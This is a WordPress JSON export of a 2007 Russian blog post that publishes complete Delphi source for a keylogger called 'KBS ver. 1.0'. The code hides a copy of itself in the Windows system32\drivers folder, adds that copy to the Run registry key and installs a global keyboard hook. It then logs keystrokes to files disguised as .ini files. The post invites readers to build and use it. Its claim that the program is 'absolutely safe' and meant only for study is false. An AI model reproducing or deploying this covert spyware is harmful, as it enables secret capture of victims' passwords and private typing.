{"id":69,"date":"2007-04-25T15:46:14","date_gmt":"2007-04-25T12:46:14","guid":{"rendered":"http:\/\/pblog.ru\/?p=69"},"modified":"2008-09-09T08:07:00","modified_gmt":"2008-09-09T05:07:00","slug":"%d0%ba%d0%bb%d0%b0%d0%b2%d0%b8%d0%b0%d1%82%d1%83%d1%80%d0%bd%d1%8b%d0%b9-%d1%88%d0%bf%d0%b8%d0%be%d0%bd","status":"publish","type":"post","link":"http:\/\/pblog.ru\/?p=69","title":{"rendered":"\u041a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043d\u044b\u0439 \u0448\u043f\u0438\u043e\u043d."},"content":{"rendered":"<p>\u0412\u043e\u0442 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u0447\u0435\u043a \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442\u0435 \u0434\u0435\u043b\u0430\u0442\u044c \u0441 \u043d\u0438\u043c \u0447\u0442\u043e \u0445\u043e\u0442\u0438\u0442\u0435, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043d\u0435 \u0437\u0430\u0437\u043d\u0430\u0432\u0430\u0439\u0442\u0435\u0441\u044c! \u041a \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0435\u0433\u043e \u043f\u0440\u0435\u0435\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0430\u043c \u043c\u043e\u0433\u0443 \u043e\u0442\u043d\u0435\u0441\u0442\u0438 \u0442\u043e \u0447\u0442\u043e \u043e\u043d \u043e\u0447\u0435\u043d\u044c \u043c\u0430\u043b \u0434\u043b\u044f \u043f\u0440\u043e\u0433\u0438 \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430 (19\u043a\u0431), \u0447\u0442\u043e \u043a\u0441\u0442\u0430\u0442\u0438 \u043b\u043e\u043c\u0430\u0435\u0442 \u0443\u0431\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043e \u0433\u0440\u0430\u043c\u043e\u0437\u0434\u043a\u043e\u0441\u0442\u0438 \u0414\u0435\u043b\u0444\u0438 \u043f\u0440\u043e\u0433, \u0438 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u043c\u0430\u043b\u043e \u043c\u0435\u0441\u0442\u0430 \u0432 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043a\u0435 (\u043e\u0431\u044b\u0447\u043d\u043e 1-1,5\u043c\u0431)!<br \/>\n\u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0430\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u0442\u043d\u0430\u044f \u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u0434\u043d\u0430\u0447\u0435\u043d\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f! \ud83d\ude42<br \/>\n<!--more--><br \/>\n\u0412\u043e\u0442 \u043a\u043e\u0434:<\/p>\n<pre><code>program ntrty;<br \/>\n\/\/                  KBS ver. 1.0<br \/>\n\/\/<br \/>\n\/\/    \u041a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043d\u044b\u0439 \u0448\u043f\u0438\u043e\u043d, DE@l Group (c) 2005-2007;<br \/>\n\/\/ \u041f\u0440\u0438 \u043f\u0435\u0440\u0432\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u043f\u0440\u043e\u0433\u0438 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u0430\u043c\u043e\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435<br \/>\n\/\/ \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0432 \u043f\u0443\u0442\u044c dir \u0441 \u0438\u043c\u0435\u043d\u0435\u043c name! \u0418 \u043f\u0440\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043d\u0438\u0435<br \/>\n\/\/ \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0442\u043e\u0439 \u043a\u043e\u043f\u0438\u0438 \u043f\u0440\u043e\u0433\u0438!<br \/>\n\/\/    \u041f\u0440\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u043f\u0440\u043e\u0433\u0438 \u0447\u0435\u0440\u0435\u0437 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0433\u0430 \u043a\u0438\u0434\u0430\u0435\u0442<br \/>\n\/\/ \u0444\u0430\u0439\u043b\u0443 \u0432 \u043f\u0443\u0442\u044c: %USERPROFILE% \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 name+\u043d\u043e\u043c\u0435\u0440+ext<br \/>\n\/\/ \u043f\u0440\u0438 \u043a\u0430\u0436\u0434\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u0444\u0430\u0439\u043b \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043f\u043e<br \/>\n\/\/ \u043f\u043e\u0440\u044f\u0434\u043a\u0443 \u043d\u043e\u043c\u0435\u0440\u043e\u043c, \u0430 \u043f\u0440\u0438 \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u0438 \u0444\u0430\u0439\u043b\u0430 \u0440\u0430\u0437\u043c\u0435\u0440\u0430 \u0432<br \/>\n\/\/ MaxFileSize \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0444\u0430\u0439\u043b!<br \/>\n\/\/    \u041f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u043f\u0440\u043e\u0433\u0438 \u0432 \u0440\u0443\u0447\u043d\u0443\u044e \u0444\u0430\u0439\u043b \u0441 \u043e\u0442\u0447\u0451\u0442\u043e\u043c<br \/>\n\/\/ \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u0441 \u043f\u0440\u043e\u0433\u043e\u0439!<br \/>\n\/\/                            13.04.2007 (\u043f\u044f\u0442\u043d\u0438\u0446\u0430)<br \/>\nuses Windows;<\/p>\n<p>const<br \/>\ndir = 'C:\\WINDOWS\\system32\\drivers\\';<br \/>\nname = 'ntrty';<br \/>\next = '.ini';<br \/>\nARCStr = 'cmd \/c reg ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v ';<br \/>\nMaxFileSize = 2048;<br \/>\nvar<br \/>\nHkHnd : hHook;<br \/>\nFCh : file of Char;<br \/>\nline : longint;<br \/>\nhApp : THandle;<br \/>\nwClass : TWndClass;<br \/>\nwMSG : TMSG;<\/p>\n<p>function WC(hInstance: HWND; style,ClsExtra,WndExtra:integer; ICON: hIcon; CURSOR: hCursor; Background: HBrush; ClassName,MenuName: string; Proc: Pointer): TWndClass;<br \/>\nvar<br \/>\nwCls : TWNDClass;<br \/>\nbegin<br \/>\nwCls.hInstance:=hInstance;<br \/>\nwCls.style:= style;<br \/>\nwith wCls do<br \/>\nbegin<br \/>\nhIcon         := ICON;<br \/>\nlpfnWndProc   := Proc;<br \/>\nhbrBackground := Background;<br \/>\nlpszClassName := PChar(ClassName);<br \/>\nhCursor       := CURSOR;<br \/>\ncbClsExtra    := ClsExtra;<br \/>\ncbWndExtra    := WndExtra;<br \/>\nlpszMenuName  := PChar(MenuName);<br \/>\nend;<br \/>\nResult:=wCls;<br \/>\nend;<\/p>\n<p>function CreateWnd(wClass: TWndClass; hInstance: HWND; Caption: string; w,h: integer): HWND;<br \/>\nbegin<br \/>\nResult:=CreateWindow(wClass.lpszClassName,<br \/>\nPChar(Caption),(0 or $C00000 or $800000 or<br \/>\n$400000 or $200000 or $100000 or $10000000),<br \/>\nInteger(DWORD($80000000)),Integer(DWORD($80000000)),<br \/>\nw, h, 0, 0, hInstance, nil);<br \/>\nend;<\/p>\n<p>procedure lpWindow(Msg: TMsg);<br \/>\nbegin<br \/>\nwhile GetMessage(Msg,0,0,0) do<br \/>\nbegin<br \/>\nTranslateMessage(Msg);<br \/>\nDispatchMessage(Msg);<br \/>\nend;<br \/>\nend;<\/p>\n<p>function IntToStr(Int: integer): string;<br \/>\nbegin<br \/>\nStr(Int, result);<br \/>\nend;<\/p>\n<p>function FileExists(const FileName : String) : Boolean;<br \/>\nvar<br \/>\nCode : Integer;<br \/>\nbegin<br \/>\nCode := GetFileAttributes(PChar(FileName));<br \/>\nResult := (Code  -1) and (16 and Code = 0);<br \/>\nend;<\/p>\n<p>function GetName: string;<br \/>\nvar<br \/>\ni : longint;<br \/>\nbegin<br \/>\ni:=0;<br \/>\nrepeat<br \/>\nInc(i);<br \/>\nuntil not FileExists(name+IntToStr(i)+ext);<br \/>\nResult:=name+IntToStr(i)+ext;<br \/>\nend;<\/p>\n<p>function Win32Check(RetVal: BOOL): BOOL;<br \/>\nbegin<br \/>\nif not RetVal then GetLastError;<br \/>\nResult := RetVal;<br \/>\nend;<\/p>\n<p>function GetCharFromVKey(vkey: Word): string;<br \/>\nvar<br \/>\nkeyst : TKeyboardState;<br \/>\nretcode : Integer;<br \/>\nbegin<br \/>\nWin32Check(GetKeyboardState(keyst));<br \/>\nSetLength(Result, 2);<br \/>\nretcode := ToAscii(vkey,<br \/>\nMapVirtualKeyA(vkey, 0),<br \/>\nkeyst, @Result[1],0);<br \/>\ncase retcode of<br \/>\n0: Result := '';<br \/>\n1: SetLength(Result, 1);<br \/>\n2: ;<br \/>\nelse<br \/>\nResult := '';<br \/>\nend;<br \/>\nend;<\/p>\n<p>function HookPr(Code: integer; WParam: word; LParam: Longint): Longint; stdcall;<br \/>\nvar<br \/>\nmsg : PEVENTMSG;<br \/>\nb : Char;<br \/>\ns : string;<br \/>\nbegin<br \/>\nif Code &gt;= 0 then<br \/>\nbegin<br \/>\nmsg := Pointer(LParam);<br \/>\nif msg.message=256 then<br \/>\nbegin<br \/>\nInc(line);<br \/>\ns:=GetCharFromVKey(msg.paramL);<br \/>\nif Length(s)&gt;0 then<br \/>\nbegin<br \/>\nb:=s[1];<br \/>\nif (line mod 80)=0 then BlockWrite(FCh,#10#13,2);<br \/>\nBlockWrite(FCh,b,1);<br \/>\nend;<br \/>\nend;<br \/>\nif FileSize(FCh)&gt;MaxFileSize then<br \/>\nbegin<br \/>\nCloseFile(FCh);<br \/>\nAssignFile(FCh,GetName);<br \/>\nReWrite(FCh)<br \/>\nend;<br \/>\nresult := CallNextHookEx(HkHnd, code, WParam, LParam);<br \/>\nend;<br \/>\nend;<\/p>\n<p>function WndMessageProc(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): UINT; stdcall;<br \/>\nbegin<br \/>\ncase Msg of<br \/>\n1:<br \/>\nbegin<br \/>\nif not FileExists(dir+name+'.exe') then<br \/>\nbegin<br \/>\nCopyfile(PChar(paramstr(0)),dir+name+'.exe',BOOL(0));<br \/>\nWinExec(dir+name+'.exe',SW_Hide);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nWinExec(PChar(ARCStr+name+' \/t REG_SZ \/d '+dir+name+'.exe \/f'),SW_Hide);<br \/>\nline:=0;<br \/>\nAssignFile(FCh,GetName);<br \/>\nReWrite(FCh);<br \/>\nrepeat<br \/>\nHkHnd := SetWindowsHookEx(0, @HookPr, hInstance, 0);<br \/>\nuntil HkHnd0;<br \/>\nend;<br \/>\n2:<br \/>\nbegin<br \/>\nif HkHnd  0 then<br \/>\nUnhookWindowsHookEx(HkHnd);<br \/>\nCloseFile(FCh);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nend;<br \/>\nResult := DefWindowProc(hWnd,Msg,wParam,lParam);<br \/>\nend;<\/p>\n<p>begin<br \/>\nwClass:=WC(hInstance,0,0,0,0,0,15,'MYCLASS','',@WndMessageProc);<br \/>\nRegisterClass(wClass);<br \/>\nhApp:=CreateWindow(wClass.lpszClassName, '',0,<br \/>\nInteger(DWORD($80000000)),<br \/>\nInteger(DWORD($80000000)),<br \/>\n0, 0, 0, 0, hInstance, nil);<br \/>\nif hApp=0 then<br \/>\nbegin<br \/>\nUnregisterClass('MYCLASS',hInstance);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nlpWindow(wMsg);<br \/>\nend.<\/code><\/pre>\n<p>\u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c \u0432 \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043e\u043c \u0444\u0430\u0439\u043b\u0435 \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c .dpr \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0432 \u0414\u0435\u043b\u0444\u0438!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0412\u043e\u0442 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u0447\u0435\u043a \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442\u0435 \u0434\u0435\u043b\u0430\u0442\u044c \u0441 \u043d\u0438\u043c \u0447\u0442\u043e \u0445\u043e\u0442\u0438\u0442\u0435, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043d\u0435 \u0437\u0430\u0437\u043d\u0430\u0432\u0430\u0439\u0442\u0435\u0441\u044c! \u041a \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0435\u0433\u043e \u043f\u0440\u0435\u0435\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0430\u043c \u043c\u043e\u0433\u0443 \u043e\u0442\u043d\u0435\u0441\u0442\u0438 \u0442\u043e \u0447\u0442\u043e \u043e\u043d \u043e\u0447\u0435\u043d\u044c \u043c\u0430\u043b \u0434\u043b\u044f \u043f\u0440\u043e\u0433\u0438 \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430 (19\u043a\u0431), \u0447\u0442\u043e \u043a\u0441\u0442\u0430\u0442\u0438 \u043b\u043e\u043c\u0430\u0435\u0442 \u0443\u0431\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043e \u0433\u0440\u0430\u043c\u043e\u0437\u0434\u043a\u043e\u0441\u0442\u0438 \u0414\u0435\u043b\u0444\u0438 \u043f\u0440\u043e\u0433, \u0438 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u043c\u0430\u043b\u043e \u043c\u0435\u0441\u0442\u0430 \u0432 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043a\u0435 (\u043e\u0431\u044b\u0447\u043d\u043e 1-1,5\u043c\u0431)! \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0430\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u0442\u043d\u0430\u044f \u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u0434\u043d\u0430\u0447\u0435\u043d\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f! \ud83d\ude42<\/p>\n","protected":false},"author":19,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,6],"tags":[246,194,282,103,120,217,192],"_links":{"self":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69"}],"collection":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=69"}],"version-history":[{"count":3,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69\/revisions"}],"predecessor-version":[{"id":213,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69\/revisions\/213"}],"wp:attachment":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=69"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=69"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}